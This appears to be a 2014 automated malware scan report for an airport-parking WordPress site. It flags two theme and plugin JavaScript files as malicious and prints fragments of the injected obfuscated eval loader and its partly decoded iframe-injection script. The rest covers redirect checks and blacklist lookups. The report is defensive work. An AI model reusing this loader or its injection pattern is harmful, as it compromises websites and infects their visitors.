Scanned pages/files
Request | Server response | Status |
http://iwanttobookairportparking.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 26 Aug 2014 17:59:21 GMT Location: http://www.iwanttobookairportparking.com/ Server: Apache/2.4.9 (Unix) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.iwanttobookairportparking.com/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.iwanttobookairportparking.com/ | 200 OK Content-Length: 14829 Content-Type: text/html | clean |
http://www.zurichairportcarhire.com/jquery.ui.button.min.js | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
http://www.zurichairportcarhire.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.iwanttobookairportparking.com/wp-content/themes/revo1/javascript/tabber.js | 200 OK Content-Length: 21348 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{abre++}catch(a6ba34y){try{sdveesg&3}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101, e("if(1)"+s); Decoded script: if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.airport-parking-shop.co.uk/scripts/affiliate.php?affiliate=1850 | 200 OK Content-Length: 1535 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2.x&key=ABQIAAAAOQDk9h3PM6f9d_nnWXyeCRTTpRreVsYug7bxN2TzHg01H6pS8RQm_dZOUdxsw2UHsU57VGfOogYxnw | 200 OK Content-Length: 5113 Content-Type: text/javascript | clean |
http://www.iwanttobookairportparking.com/wp-content/plugins/google-maps-advanced/googlemapsPlugin.js | 200 OK Content-Length: 19515 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{abre++}catch(a6ba34y){try{sdveesg&3}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101, e("if(1)"+s); Decoded script: if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 26 Aug 2014 17:59:21 GMT
Location: http://www.iwanttobookairportparking.com/
Server: Apache/2.4.9 (Unix)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iwanttobookairportparking.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 26 Aug 2014 17:59:21 GMT
Location: http://www.iwanttobookairportparking.com/
Server: Apache/2.4.9 (Unix)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iwanttobookairportparking.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Referer: http://www.google.com/search?q=iwanttobookairportparking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Referer: http://www.google.com/search?q=iwanttobookairportparking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iwanttobookairportparking.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iwanttobookairportparking.com/
Result: iwanttobookairportparking.com is not infected or malware details are not published yet.
Result: iwanttobookairportparking.com is not infected or malware details are not published yet.